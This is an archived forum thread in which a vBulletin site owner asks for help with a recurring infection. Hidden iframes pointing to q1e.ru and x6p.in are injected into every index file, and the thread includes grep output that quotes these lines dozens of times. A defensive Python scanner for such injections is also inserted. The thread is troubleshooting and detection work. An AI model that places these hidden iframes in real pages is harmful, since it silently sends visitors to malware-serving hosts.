vb.org Archive


ezak 07-26-2009 01:57 PM

My forum is infected with an unknown virus

For a month I have faced a problem:
all my index* files contain this code

PHP Code:

<iframe src="http://q1e.ru:8080/index.php" width=143 height=132 style="visibility: hidden"></iframe>

It infects ./forum/index.php, /index.html (redirects to forum/index.php), /admincp/index.php, modcp/index.php ... and any file with index in its name will be infected.


It also stops my forum.
I removed a lot of other scripts on that site, scanned for viruses, and installed ModSecurity with most rules.

It happened again, and I don't know why I have this problem. Does anyone know anything about this virus?

Marco van Herwaarden 07-27-2009 08:55 AM

What kind of server are you on? A shared server?

Most likely someone has access to your files and is editing them.

ezak 07-27-2009 09:26 AM

I'm on a VPS and all the sites on it are mine,
and the other site does not have this problem,
only this one.
It happened suddenly and changed all index files with that code.
It has some sites like
Code:

http://q1e.ru:8080
and others similar to it; I don't know what it is.

It happens weekly or every 5 days.

Marco van Herwaarden 07-27-2009 09:45 AM

Contact your host, most likely someone has access to your files.

ezak 07-28-2009 07:30 AM

It's driving me crazy.
Some info from
grep -R iframe *
all my styles, and the forum index

PHP Code:

vb/ubetube/misc/index.html:<iframe src="http://x6p.in:8080/index.php" width=188 height=195 style="visibility: hidden"></iframe>
vb/ubetube/misc/index.html:<iframe src="http://q1e.ru:8080/index.php" width=143 height=132 style="visibility: hidden"></iframe>
vb/ubetube/ranks/index.html:<iframe src="http://x6p.in:8080/index.php" width=188 height=195 style="visibility: hidden"></iframe>
vb/ubetube/ranks/index.html:<iframe src="http://q1e.ru:8080/index.php" width=143 height=132 style="visibility: hidden"></iframe>
vb/ubetube/avatars/thumbs/index.html:<iframe src="http://x6p.in:8080/index.php" width=188 height=195 style="visibility: hidden"></iframe>
vb/ubetube/avatars/thumbs/index.html:<iframe src="http://q1e.ru:8080/index.php" width=143 height=132 style="visibility: hidden"></iframe>
vb/ubetube/avatars/index.html:<iframe src="http://x6p.in:8080/index.php" width=188 height=195 style="visibility: hidden"></iframe>
vb/ubetube/avatars/index.html:<iframe src="http://q1e.ru:8080/index.php" width=143 height=132 style="visibility: hidden"></iframe>
vb/ubetube/attach/index.html:<iframe src="http://x6p.in:8080/index.php" width=188 height=195 style="visibility: hidden"></iframe>
vb/ubetube/attach/index.html:<iframe src="http://q1e.ru:8080/index.php" width=143 height=132 style="visibility: hidden"></iframe>
vb/ubetube/index.html:<iframe src="http://x6p.in:8080/index.php" width=188 height=195 style="visibility: hidden"></iframe>
vb/ubetube/index.html:<iframe src="http://q1e.ru:8080/index.php" width=143 height=132 style="visibility: hidden"></iframe>
vb/ubetube/gradients/index.html:<iframe src="http://x6p.in:8080/index.php" width=188 height=195 style="visibility: hidden"></iframe>
vb/ubetube/gradients/index.html:<iframe src="http://q1e.ru:8080/index.php" width=143 height=132 style="visibility: hidden"></iframe>
vb/ubetube/smilies/index.html:<iframe src="http://x6p.in:8080/index.php" width=188 height=195 style="visibility: hidden"></iframe>
vb/ubetube/smilies/index.html:<iframe src="http://q1e.ru:8080/index.php" width=143 height=132 style="visibility: hidden"></iframe>
vb/ubetube/buttons/index.html:<iframe src="http://x6p.in:8080/index.php" width=188 height=195 style="visibility: hidden"></iframe>
vb/ubetube/buttons/index.html:<iframe src="http://q1e.ru:8080/index.php" width=143 height=132 style="visibility: hidden"></iframe>
vb/ubetube/icons/index.html:<iframe src="http://x6p.in:8080/index.php" width=188 height=195 style="visibility: hidden"></iframe>
vb/ubetube/icons/index.html:<iframe src="http://q1e.ru:8080/index.php" width=143 height=132 style="visibility: hidden"></iframe>
vb/ubetube/polls/index.html:<iframe src="http://x6p.in:8080/index.php" width=188 height=195 style="visibility: hidden"></iframe>
vb/ubetube/polls/index.html:<iframe src="http://q1e.ru:8080/index.php" width=143 height=132 style="visibility: hidden"></iframe>
vb/ubetube/statusicon/index.html:<iframe src="http://x6p.in:8080/index.php" width=188 height=195 style="visibility: hidden"></iframe>
vb/ubetube/statusicon/index.html:<iframe src="http://q1e.ru:8080/index.php" width=143 height=132 style="visibility: hidden"></iframe>
vb/ubetube/regimage/index.html:<iframe src="http://x6p.in:8080/index.php" width=188 height=195 style="visibility: hidden"></iframe>
vb/ubetube/regimage/index.html:<iframe src="http://q1e.ru:8080/index.php" width=143 height=132 style="visibility: hidden"></iframe>
vb/ubetube/regimage/backgrounds/index.html:<iframe src="http://x6p.in:8080/index.php" width=188 height=195 style="visibility: hidden"></iframe>
vb/ubetube/regimage/backgrounds/index.html:<iframe src="http://q1e.ru:8080/index.php" width=143 height=132 style="visibility: hidden"></iframe>
vb/ubetube/regimage/fonts/index.html:<iframe src="http://x6p.in:8080/index.php" width=188 height=195 style="visibility: hidden"></iframe>
vb/ubetube/regimage/fonts/index.html:<iframe src="http://q1e.ru:8080/index.php" width=143 height=132 style="visibility: hidden"></iframe>
vb/ubetube/editor/index.html:<iframe src="http://x6p.in:8080/index.php" width=188 height=195 style="visibility: hidden"></iframe>
vb/ubetube/editor/index.html:<iframe src="http://q1e.ru:8080/index.php" width=143 height=132 style="visibility: hidden"></iframe>
vb/ubetube/reputation/index.html:<iframe src="http://x6p.in:8080/index.php" width=188 height=195 style="visibility: hidden"></iframe>
vb/ubetube/reputation/index.html:<iframe src="http://q1e.ru:8080/index.php" width=143 height=132 style="visibility: hidden"></iframe>
vb/ubetube/rating/index.html:<iframe src="http://x6p.in:8080/index.php" width=188 height=195 style="visibility: hidden"></iframe>
vb/ubetube/rating/index.html:<iframe src="http://q1e.ru:8080/index.php" width=143 height=132 style="visibility: hidden"></iframe>

Every day now, all index files contain this code.
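
An added example, not part of the thread and not any poster's code: a Python scanner that narrows `grep -R iframe *` to hidden iframes with an off-site src in index* files, grouped by injected host and carrying each file's modification time so a re-infection can be lined up with FTP and web server logs. The function names and the SAMPLE string are assumptions built from the snippet quoted in the first post.

```python
import os
import re
import time
from collections import defaultdict
from urllib.parse import urlparse

# Only the opening tag is matched: the closing </iframe> may be cut off.
IFRAME_TAG = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
SRC_ATTR = re.compile(r"""\bsrc\s*=\s*["']?([^"'\s>]+)""", re.IGNORECASE)
HIDDEN = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.IGNORECASE)

# Constructed sample: the injected line from the first post plus a visible, benign iframe.
SAMPLE = ('<iframe src="http://q1e.ru:8080/index.php" width=143 height=132 '
          'style="visibility: hidden"></iframe\n'
          '<iframe src="http://video.example/player" width=400 height=300></iframe>')


def find_hidden_iframes(text, own_hosts=()):
    """Return the host of every hidden iframe whose src points off-site."""
    hosts = []
    for tag in IFRAME_TAG.findall(text):
        src = SRC_ATTR.search(tag)
        if src is None or not HIDDEN.search(tag):
            continue
        host = urlparse(src.group(1)).netloc.lower()
        if host and host not in own_hosts:  # a relative src has no host
            hosts.append(host)
    return hosts


def scan_webroot(root, own_hosts=()):
    """Map injected host -> [(path, mtime)] for index* files under root."""
    hits = defaultdict(list)
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().startswith("index"):  # pattern reported in the thread
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    found = find_hidden_iframes(fh.read(), own_hosts)
                mtime = os.path.getmtime(path)
            except OSError:
                continue  # unreadable file: skip it, keep scanning
            for host in found:
                hits[host].append((path, mtime))
    return dict(hits)


if __name__ == "__main__":
    for host, found in sorted(scan_webroot(".").items()):
        print(host, len(found), "file(s), last modified", time.ctime(max(m for _, m in found)))
```

Run it from the web root; pass the site's own host names as `own_hosts` if the site legitimately embeds hidden frames from them.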

flapjack 07-28-2009 08:38 AM

Your webserver has a vulnerability of some sort.

Probably to do with an old version of cPanel or something like that.

Marco van Herwaarden 07-30-2009 10:44 AM

See post #4.

ezak 07-30-2009 11:35 AM

I already manage this host;
it is my own VPS, and I already have control of the node server,
and I don't know what to do.
I have already secured my server
with a hard CSF config, and installed Mod_Security with the most common rules.

--------------- Added 07-30-2009 at 12:40 PM ---------------

I found this; it may be related to my issue

http://blog.unmaskparasites.com/2009...k-php-exploit/


All times are GMT. The time now is 04:39 AM.
